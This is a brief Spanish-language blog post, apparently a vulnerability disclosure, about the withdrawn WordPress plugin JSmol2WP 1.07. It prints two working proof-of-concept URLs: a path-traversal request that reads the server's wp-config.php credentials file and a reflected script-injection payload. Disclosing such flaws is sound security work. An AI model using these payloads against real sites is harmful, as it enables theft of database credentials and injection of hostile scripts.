JSmol2WP 1.07 XSS y SSRF

Si te dedicas a la ciencia es posible que conozcas el plugin JSmol2WP que permitía añadir JSmol applets en el sitio web de forma sencilla mediante un shortcode.

Este plugin ahora desaparecido del repositorio, permitía básicamente ejecutar scripts y acceder a ficheros del servidor de forma sencilla a través de la dirección URL.

Un ejemplo para el SSRF:

http://localhost/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php

Y un ejemplo para el XSS:

http://localhost/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=saveFile&data=<script>alert(/xss/)</script>&mimetype=text/html; charset=utf-8

WPVDB ID 9196 / 9197

Deja un comentario